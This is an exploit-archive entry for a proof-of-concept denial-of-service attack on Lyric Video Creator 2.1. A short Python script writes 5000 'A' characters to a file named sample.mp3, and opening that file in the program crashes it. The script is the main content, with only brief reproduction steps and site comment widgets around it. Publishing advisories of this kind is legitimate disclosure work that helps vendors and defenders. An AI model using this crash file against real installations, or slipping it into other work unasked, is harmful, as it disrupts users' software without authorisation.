Lyric Video Creator 2.1 Denial Of Service

2019.05.11

Credit: Alejandra Sanchez

Risk: Low

Local: Yes

Remote: No

CVE: N/A

CWE: N/A

# -*- coding: utf-8 -*-
# Exploit Title: Lyric Video Creator 2.1 - '.mp3' Denial of Service (PoC)
# Date: 08/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: https://lyricvideocreator.com/
# Software Link: https://lyricvideocreator.com/dwl/LyricVideoCreator.exe
# Version: 2.1
# Tested on: Windows 10
# Proof of Concept:
# 1.- Run the python script "LyricVideo.py", it will create a new file "sample.mp3"
# 2.- Open LyricVideoCreator.exe
# 4.- Click on the 'Browse song' button, select the 'sample.mp3' file created and click on the 'Open' button
# 5.- Crashed
buffer = "\x41" * 5000
f = open ("sample.mp3", "w")
f.write(buffer)
f.close()

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Lyric Video Creator 2.1 Denial Of Service

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.